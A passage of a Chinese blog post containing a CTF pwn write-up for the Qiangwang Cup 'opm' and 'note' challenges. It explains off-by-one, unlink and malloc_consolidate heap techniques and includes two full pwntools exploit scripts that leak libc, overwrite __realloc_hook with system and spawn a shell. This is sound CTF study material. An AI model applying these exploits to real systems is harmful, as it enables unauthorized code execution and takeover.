class="string">'./opm'</span>)</span><br><span class="line">    libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="keyword">print</span> <span class="string">'time is up'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(name , punches)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'(E)xit\n'</span>)</span><br><span class="line">    p.sendline(<span class="string">'A'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'name:\n'</span>)</span><br><span class="line">    p.sendline(name)</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'punch?\n'</span>)</span><br><span class="line">    p.sendline(str(punches))</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">()</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'(E)xit\n'</span>)</span><br><span class="line">    p.sendline(<span class="string">'S'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">print</span> pidof(p)[<span class="number">0</span>]</span><br><span class="line">    raw_input()</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./opm'</span>)</span><br><span class="line"><span class="comment">#one_gadget = 0x45216 0x4526a 0xf02a4 0xf1147</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#step 1 leak elf_base</span></span><br><span class="line">add(<span class="string">'a'</span> * <span class="number">0x30</span> , <span class="number">0x10</span>)</span><br><span class="line">add(<span class="string">'b'</span> * <span class="number">0x30</span> , <span class="number">0x20</span>)</span><br><span class="line">add(<span class="string">'c'</span> , <span class="number">0x30</span>)</span><br><span class="line">add(<span class="string">'d'</span> * <span class="number">0x80</span> + <span class="string">'\x63'</span> , <span class="number">0x40</span>)</span><br><span class="line">debug()</span><br><span class="line">add(<span class="string">'e'</span> * <span class="number">0x80</span> + <span class="string">'\x54'</span> , <span class="string">'1'</span> * <span class="number">0x80</span> + <span class="string">'\x63'</span>)</span><br><span class="line"><span class="comment">#use 0054 + 0x10 (v6 -&gt; length) to make a d00  ,  change 0054 to 0063 to point d00</span></span><br><span class="line">elf.address = u64(p.recvuntil(<span class="string">'&gt;'</span>)[<span class="number">1</span>:<span class="number">-1</span>] + <span class="string">'\x00'</span> * <span class="number">2</span>) - <span class="number">0xb30</span></span><br><span class="line">success(<span class="string">'elf_base =&gt; '</span> + hex(elf.address))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step 2 use f00 to leak libc_base</span></span><br><span class="line">atoi_got = elf.got[<span class="string">'atoi'</span>]</span><br><span class="line">success(<span class="string">'atoi_got =&gt; '</span> + hex(atoi_got))</span><br><span class="line">add(<span class="string">'f'</span> * <span class="number">8</span> + p64(atoi_got) , <span class="number">0x50</span>)</span><br><span class="line">add(<span class="string">'g'</span>  , <span class="string">'g'</span> * <span class="number">0x80</span>)</span><br><span class="line">libc.address = u64(p.recvuntil(<span class="string">'&gt;'</span>)[<span class="number">1</span>:<span class="number">-1</span>] + <span class="string">'\x00'</span> * <span class="number">2</span>) - libc.symbols[<span class="string">'atoi'</span>]</span><br><span class="line">success(<span class="string">'libc_base =&gt; '</span> + hex(libc.address))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step 3 use 000 and show() to trigger one_gadget</span></span><br><span class="line">one_gadget = libc.address + <span class="number">0x4526a</span></span><br><span class="line">add(<span class="string">'h'</span> * <span class="number">0x60</span> + p64(one_gadget), <span class="string">''</span>)</span><br><span class="line">add(<span class="string">'i'</span> * <span class="number">0x80</span> , <span class="string">''</span>)</span><br><span class="line">show()</span><br><span class="line"></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h2 id="0x04-note"><a href="#0x04-note" class="headerlink" title="0x04 note"></a>0x04 note</h2><ul>
<li><strong>漏洞位置</strong></li>
</ul>
<p>该程序为socket程序，绑定为1234端口，需要系统有note的用户权限。程序在<strong>change_title</strong>的功能中存在<strong>off_by_one</strong>漏洞。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-57f70e10e520e9a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="off_by_one"><br>不过由于前面<strong>check_asc()</strong>中的限制，导致只能用<strong>0x0a、0x21、0x22、0x23、0x26、0x27、0x3F、0x40</strong>这几个规定内的字节进行溢出。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-65afdd29f0019e73.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="check_asc"></p>
<ul>
<li><strong>利用思路</strong><br>题目限制只能<strong>realloc3次</strong>，利用<strong>0x40</strong>进行<strong>off_by_one</strong>并布置<strong>unlink</strong>环境，在此之前应该首先利用<strong>change_content</strong>功能构造好满足<strong>0x40</strong>大小的下一个<strong>chunk head</strong>。由于<strong>0x40</strong>大小的堆块在<strong>fastbin</strong>的范围内，无法直接<strong>free</strong>触发<strong>unlink</strong>，于是第二次<strong>realloc</strong>将该<strong>chunk</strong>放入<strong>fastbin</strong>中，在第三次<strong>realloc</strong>时触发<strong>malloc_consolidate</strong>进行<strong>unlink</strong>。<strong>unlink</strong>后，使<strong>.bss</strong>上的<strong>title</strong>指向<strong>comment</strong>指针，再配合<strong>change_comment</strong>功能，实现任意地址写，最终采用写<strong>realloc_hook</strong>为<strong>system</strong>的方法<strong>get shell</strong>。(不知道是否本地环境的问题，一开始就能直接<strong>leak libc</strong>)<blockquote>
<p><strong>realloc</strong><br>函数原型为<strong>realloc(ptr, size)</strong>，其中<strong>ptr</strong>为指向堆的指针，<strong>size</strong>为需要<strong>realloc</strong>的大小，根据<strong>size</strong>的大小有以下几种情况：</p>
<ul>
<li><strong>size = 0</strong>时，相当于<strong>free(ptr)</strong>。</li>
<li><strong>size &lt; ptr原大小</strong>时，会将原<strong>chunk</strong>分割为两部分，<strong>free</strong>掉后面的<strong>chunk</strong>。</li>
<li><strong>size = ptr原大小</strong>时，没什么卵用，不会进行任何操作。<strong>注：该等于为将size对齐后相等。</strong></li>
<li><strong>size &gt; ptr原大小</strong>时，若<strong>ptr</strong>下方为<strong>top chunk</strong>或者下方存在<strong>fastbin</strong>之外的<strong>free chunk</strong>并且<strong>size(free chunk) + size(ptr原大小) ≥ size</strong>，则将该堆块大小扩展至<strong>size</strong>，若不满足上述条件，则相当于<strong>free(ptr)</strong>然后<strong>malloc(size)</strong>。</li>
</ul>
</blockquote>
</li>
</ul>
<blockquote>
<p><strong>malloc_consolidate</strong><br>该函数会将<strong>fastbin</strong>中的所有<strong>chunk</strong>整合到<strong>unsort bin</strong>中，并且在从<strong>fastbin</strong>中摘下<strong>chunk</strong>时会检查相邻的堆块是否为<strong>free</strong>状态，若为<strong>free</strong>状态则将触发堆融合。本题采用<strong>malloc</strong>大于<strong>top chunk</strong>的<strong>size</strong>触发<strong>malloc_consolidate</strong>。</p>
</blockquote>
<ul>
<li><strong>my-exp.py</strong><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	p = remote(<span class="string">'0'</span> , <span class="number">1234</span>)</span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	<span class="keyword">print</span> <span class="string">'time is up'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_title</span><span class="params">(title)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'---&gt;&gt;\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'title:'</span>)</span><br><span class="line">	p.send(title)					<span class="comment">#off_by_one</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_content</span><span class="params">(size , content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'---&gt;&gt;'</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'256):'</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(<span class="string">'content:'</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_comment</span><span class="params">(comment)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'---&gt;&gt;'</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'comment:'</span>)</span><br><span class="line">	p.sendline(comment)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">()</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'---&gt;&gt;'</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'is:'</span>)</span><br><span class="line">	<span class="keyword">return</span> p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#step1 leak libc_base</span></span><br><span class="line">libc.address = u64(show().ljust(<span class="number">8</span> , <span class="string">'\x00'</span>)) - <span class="number">0x3c4b78</span></span><br><span class="line">success(<span class="string">'libc_base =&gt; '</span> + hex(libc.address))</span><br><span class="line"></span><br><span class="line">system_addr = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">info(<span class="string">'system_addr =&gt; '</span> + hex(system_addr))</span><br><span class="line">realloc_hook = libc.symbols[<span class="string">'__realloc_hook'</span>]</span><br><span class="line">info(<span class="string">'realloc_hook =&gt; '</span> + hex(realloc_hook))</span><br><span class="line">binsh_addr = libc.search(<span class="string">'/bin/sh\x00'</span>).next()</span><br><span class="line">info(<span class="string">'binsh_addr =&gt; '</span> + hex(binsh_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step2 make unlink</span></span><br><span class="line">content = <span class="number">0x602070</span></span><br><span class="line">payload = p64(<span class="number">0x30</span>) + p64(<span class="number">0x20</span>) + p64(content - <span class="number">0x18</span>) + p64(content - <span class="number">0x10</span>) + p64(<span class="number">0x20</span>) + <span class="string">'\x40'</span></span><br><span class="line">change_content(<span class="number">0x78</span> , <span class="number">0x38</span> * <span class="string">'A'</span> + p64(<span class="number">0x41</span>))</span><br><span class="line">change_title(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#step3 free content to fastbin</span></span><br><span class="line">change_content(<span class="number">0x100</span> , <span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#step4 trigger malloc_consolidate to unlink</span></span><br><span class="line">change_content(<span class="number">0x20000</span> , <span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#step5 realloc_hook -&gt; system</span></span><br><span class="line">change_title(p64(realloc_hook) + <span class="string">'\n'</span>)</span><br><span class="line">change_comment(p64(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step6 reset chance &amp; content -&gt; /bin/sh</span></span><br><span class="line">change_title(p64(<span class="number">0x602050</span>) + p64(binsh_addr) + <span class="string">'\n'</span>)</span><br><span class="line">change_comment(p64(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step7 realloc(content , size) =&gt; realloc_hook(binsh_addr) =&gt; system('/bin/sh\x00')</span></span><br><span class="line">p.recvuntil(<span class="string">'option---&gt;&gt;'</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'(64-256):'</span>)</span><br><span class="line">p.sendline(<span class="string">''</span>)			<span class="comment">#size doesn't matter</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#Get Shell &amp; Have Fun</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></li>
</ul>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a  href="/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/">第二届强网杯pwn writeup【部分】</a></p>
        <p><span>文章作者:</span><a  href="/" title="访问 Fish_o0O 的个人博客">Fish_o0O</a></p>
        <p><span>发布时间:</span>2020年03月12日 - 20时30分</p>
        <p><span>最后更新:</span>2020年03月12日 - 18时59分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/" title="第二届强网杯pwn writeup【部分】">http://fish-o0o.github.io/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/</a>
            <span class="copy-path" data-clipboard-text="原文: http://fish-o0o.github.io/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/　　作者: Fish_o0O" title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a  href="/2020/03/12/CVE-2017-8570%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          CVE-2017-8570 Microsoft Office 逻辑漏洞复现和利用
        
      </div>
    </a>
  
  
    <a  href="/2020/03/12/%E5%88%B7Jarvis%20OJ%E6%97%B6%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B0%E5%A7%BF%E5%8A%BF%5B%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0%5D/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">刷Jarvis OJ时学到的新姿势【不定时更新】</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-Silent"><span class="toc-number">2.</span> <span class="toc-text">0x01 Silent</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-Silent2"><span class="toc-number">3.</span> <span class="toc-text">0x02 Silent2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-opm"><span class="toc-number">4.</span> <span class="toc-text">0x03 opm</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-note"><span class="toc-number">5.</span> <span class="toc-text">0x04 note</span></a></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>






    



    <div class="scroll" id="post-nav-button">
        
            <a  href="/2020/03/12/CVE-2017-8570%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/" title="上一篇: CVE-2017-8570 Microsoft Office 逻辑漏洞复现和利用">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a  href="/2020/03/12/%E5%88%B7Jarvis%20OJ%E6%97%B6%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B0%E5%A7%BF%E5%8A%BF%5B%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0%5D/" title="下一篇: 刷Jarvis OJ时学到的新姿势【不定时更新】">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/0CTF2018%20babyheap/">0CTF2018 babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CVE-2017-0199%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/">CVE-2017-0199 Microsoft Office 逻辑漏洞复现和利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/HCTF2017%20Level2%E7%9A%84%E4%B8%A4%E9%81%93pwn%E9%A2%98/">HCTF2017 level2的两道pwn题</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CVE-2017-8570%20Microsoft%20Office%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/">CVE-2017-8570 Microsoft Office 逻辑漏洞复现和利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/">第二届强网杯pwn writeup【部分】</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E5%88%B7Jarvis%20OJ%E6%97%B6%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B0%E5%A7%BF%E5%8A%BF%5B%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0%5D/">刷Jarvis OJ时学到的新姿势【不定时更新】</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E7%94%B1%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E5%BC%95%E5%8F%91%E7%9A%84DNS%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">由一道题目引发的DNS学习笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CVE-2012-0158%20Microsoft%20Office%20%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">CVE-2012-0158 Microsoft Office 栈溢出漏洞分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/BCTF2018%20baby_arena/">BCTF2018 baby_arena</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E5%B0%81%E4%BA%86%E4%B8%AA%E5%BA%93/">封了个库</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%B8%80%E5%9C%BAWriteup/">网鼎杯第一场Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/XNUCA2018%E5%88%9D%E8%B5%9Bpwn%20writeup/">XNUCA2018初赛pwn writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/">CISCN2019 国赛线上初赛pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/Tcache%E6%9C%BA%E5%88%B6%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/">Tcache机制及漏洞利用方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/Ubuntu%E8%99%9A%E6%8B%9F%E6%9C%BA%E6%89%A9%E5%AE%B9%20Step%20by%20Step/">Ubuntu虚拟机扩容 Step by Step</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/FILE%E7%BB%93%E6%9E%84%E4%BD%93%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95/">FILE结构体及漏洞利用方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/12/Windows%E7%B3%BB%E7%BB%9F%E4%B8%8B%E5%85%B8%E5%9E%8B%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%BA%A7%E7%94%9F%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%E7%A0%94%E7%A9%B6/">Windows系统下典型堆漏洞产生原理及利用方法研究</a></li></ul>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2020 Fish_o0O
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo &nbsp;&nbsp;</a><a href="https://github.com/maochunguang" target="_blank">Blog</a> by tommy
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 3;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>






<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>